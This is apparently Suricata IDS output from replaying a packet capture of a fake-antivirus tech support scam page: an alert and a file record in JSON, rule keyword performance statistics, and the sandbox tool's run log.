{"timestamp":"2018-01-06T02:37:58.683848+0000","flow_id":1108708064770002,"event_type":"alert","src_ip":"185.159.83.48","src_port":80,"dest_ip":"10.1.6.102","dest_port":50661,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2827062,"rev":2,"signature":"ETPRO CURRENT_EVENTS Tech Support Scam Landing Jul 07 2017","category":"A Network Trojan was detected","severity":1}}
{"timestamp":"2018-01-06T02:37:58.683848+0000","flow_id":414823881478399,"event_type":"fileinfo","src_ip":"144.208.76.207","src_port":80,"dest_ip":"10.1.6.102","dest_port":50624,"proto":"TCP","http":{"hostname":"www.prelatureofayaviri.org","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":34997},"app_proto":"http","fileinfo":{"filename":"\/","gaps":false,"state":"CLOSED","stored":false,"size":34475,"tx_id":0}}


keyword_perf.log - (11130 bytes) - download
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 11/21/2018 -- 13:05:51
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             1328780         386             386             23612           3442.00         3442.00         0.00           
  content          3542376         620             380             142580          5713.00         4930.00         6954.00        
  pcre             837295          109             43              31456           7681.00         7964.00         7497.00        
  byte_test        140446          38              17              15996           3695.00         4677.00         2901.00        
  isdataat         16754           6               0               2976            2792.00         0.00            2792.00        
  flowbits         15115           1               1               15115           15115.00        15115.00        0.00           
  urilen           281145          85              26              21143           3307.00         3753.00         3111.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             1328780         386             386             23612           3442.00         3442.00         0.00           
  flowbits         15115           1               1               15115           15115.00        15115.00        0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          369237          84              40              25593           4395.00         4899.00         3937.00        
  pcre             51152           4               1               31218           12788.00        31218.00        6644.00        
  byte_test        140446          38              17              15996           3695.00         4677.00         2901.00        
  isdataat         11329           4               0               2976            2832.00         0.00            2832.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          363308          94              58              16321           3864.00         3836.00         3911.00        
  pcre             341962          45              8               22018           7599.00         11400.00        6777.00        
  isdataat         5425            2               0               2809            2712.00         0.00            2712.00        
  urilen           281145          85              26              21143           3307.00         3753.00         3111.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          6478            2               0               3262            3239.00         0.00            3239.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1162064         50              25              142580          23241.00        14666.00        31815.00       
  pcre             75799           4               0               31456           18949.00        0.00            18949.00       
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1139104         260             187             33568           4381.00         4401.00         4329.00        
  pcre             311089          46              24              15208           6762.00         6781.00         6741.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          167739          41              17              15958           4091.00         4235.00         3988.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          27251           8               8               3888            3406.00         3406.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          113506          26              8               20878           4365.00         4127.00         4471.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          127497          35              25              4656            3642.00         3651.00         3621.00        
  pcre             57293           10              10              11132           5729.00         5729.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          32311           9               9               4516            3590.00         3590.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          33881           11              3               3545            3080.00         3109.00         3069.00        


IDSDeathBlossom.py.log - (1200 bytes) - download
2018-11-21 13:05:27,086 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2018-11-21 13:05:27,882 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2018-11-21 13:05:27,882 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2018-11-21 13:05:27,883 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2018-11-21 13:05:27,883 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2018-11-21 13:05:27,884 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/ee5317774464e42d2b80588913a4883956b33745cb75ec8c950e11a498e082d2 -r /var/pcap/11212018.1305-2018-01-06-fake-AV-page-after-viewing-prelatureofayaviri.org.pcap -vvv -k none
2018-11-21 13:05:51,312 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2018-11-21 13:05:51,312 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 24.2399001122